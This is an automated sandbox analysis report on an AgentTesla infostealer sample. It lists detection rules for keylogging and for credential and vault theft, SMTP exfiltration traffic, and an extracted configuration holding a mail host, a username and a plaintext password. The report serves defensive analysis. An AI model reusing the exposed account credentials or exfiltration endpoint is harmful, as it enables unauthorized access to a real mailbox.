Edit tour

Windows Analysis Report
NEW ORDER 98540-0.exe

Overview

General Information

Sample name:	NEW ORDER 98540-0.exe
Analysis ID:	1408956
MD5:	df93e537cd7ba3dbc8fefe3e5aff9e0a
SHA1:	7a04c2ba75e5bacb7052388d0fe32b2ce3e0fc3b
SHA256:	7a20de1b4a4cd2e217be33f3297d2b38d7e7fd69ee216d58f0400160e41ff3ea
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

Contains functionality to log keystrokes (.Net Source)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

NEW ORDER 98540-0.exe (PID: 6028 cmdline: C:\Users\user\Desktop\NEW ORDER 98540-0.exe MD5: DF93E537CD7BA3DBC8FEFE3E5AFF9E0A)

NEW ORDER 98540-0.exe (PID: 5476 cmdline: C:\Users\user\Desktop\NEW ORDER 98540-0.exe MD5: DF93E537CD7BA3DBC8FEFE3E5AFF9E0A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.3341066327.000000000323E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: NEW ORDER 98540-0.exe PID: 6028	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: NEW ORDER 98540-0.exe PID: 6028	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: NEW ORDER 98540-0.exe PID: 6028	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: NEW ORDER 98540-0.exe PID: 5476	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: NEW ORDER 98540-0.exe PID: 5476	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31735:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31851:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3192d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a53:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.NEW ORDER 98540-0.exe.4355160.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.NEW ORDER 98540-0.exe.4355160.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.NEW ORDER 98540-0.exe.4355160.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31735:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31851:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3192d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a53:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.NEW ORDER 98540-0.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.NEW ORDER 98540-0.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.NEW ORDER 98540-0.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33535:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33651:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3372d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33853:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6dee3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa8703:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33535:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6df55:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa8775:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6dfdf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa87ff:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33651:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e071:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa8891:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e0db:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa88fb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3372d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e14d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa896d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e1e3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa8a03:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6dce3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33535:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6dd55:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6dddf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33651:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6de71:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6dedb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3372d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6df4d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6dfe3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33853:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e073:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 12 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\NEW ORDER 98540-0.exe, Initiated: true, ProcessId: 5476, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49712

Snort Signatures

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.6 - Destination IP: 50.87.139.143

Timestamp:	03/14/24-14:11:01.303269
SID:	2030171
Source Port:	49712
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/Agent Tesla SMTP Activity - Source IP: 192.168.2.6 - Destination IP: 50.87.139.143

Timestamp:	03/14/24-14:11:01.303269
SID:	2839723
Source Port:	49712
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}

Multi AV Scanner detection for submitted file

Source: NEW ORDER 98540-0.exe

ReversingLabs: Detection: 34%

Machine Learning detection for sample

Source: NEW ORDER 98540-0.exe

Joe Sandbox ML: detected

Source: NEW ORDER 98540-0.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: NEW ORDER 98540-0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49712 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.6:49712 -> 50.87.139.143:587

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.6:49712 -> 50.87.139.143:587

Source: Joe Sandbox View

IP Address: 50.87.139.143 50.87.139.143

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic

TCP traffic: 192.168.2.6:49712 -> 50.87.139.143:587

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: mail.elec-qatar.com

Source: NEW ORDER 98540-0.exe, 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.elec-qatar.com
Source: NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER 98540-0.exe, 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, NmHr1WHWKO.cs	.Net Code: IiB
Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, NmHr1WHWKO.cs	.Net Code: IiB

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: NEW ORDER 98540-0.exe

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_01378C70	0_2_01378C70
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_01377C02	0_2_01377C02
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_01378D11	0_2_01378D11
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_01378F82	0_2_01378F82
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_01377458	0_2_01377458
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_055CABA0	0_2_055CABA0
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_055C2D00	0_2_055C2D00
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_055C2CF0	0_2_055C2CF0
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_055C0944	0_2_055C0944
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 0_2_055CAB90	0_2_055CAB90
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_030D9B30	3_2_030D9B30
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_030D4A98	3_2_030D4A98
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_030D3E80	3_2_030D3E80
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_030DCDA8	3_2_030DCDA8
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_030D41C8	3_2_030D41C8
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067C56C8	3_2_067C56C8
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067C3F40	3_2_067C3F40
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067CDCF8	3_2_067CDCF8
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067CBCF0	3_2_067CBCF0
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067C2AF8	3_2_067C2AF8
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067C9AD0	3_2_067C9AD0
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067C8BFB	3_2_067C8BFB
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067C0040	3_2_067C0040
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067C4FE8	3_2_067C4FE8
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Code function: 3_2_067C3233	3_2_067C3233

Source: NEW ORDER 98540-0.exe, 00000000.00000002.2108459094.0000000003155000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs NEW ORDER 98540-0.exe
Source: NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs NEW ORDER 98540-0.exe
Source: NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs NEW ORDER 98540-0.exe
Source: NEW ORDER 98540-0.exe, 00000000.00000002.2107788607.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs NEW ORDER 98540-0.exe
Source: NEW ORDER 98540-0.exe, 00000000.00000002.2111404130.0000000007620000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs NEW ORDER 98540-0.exe
Source: NEW ORDER 98540-0.exe, 00000003.00000002.3339119866.0000000001359000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs NEW ORDER 98540-0.exe
Source: NEW ORDER 98540-0.exe, 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs NEW ORDER 98540-0.exe
Source: NEW ORDER 98540-0.exe	Binary or memory string: OriginalFilenamenZow.exeB vs NEW ORDER 98540-0.exe

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: NEW ORDER 98540-0.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: NEW ORDER 98540-0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, ISZbPXDvPz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, ISZbPXDvPz.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, nAXAT51m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, nAXAT51m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, nAXAT51m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, nAXAT51m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, YpS.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, YpS.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
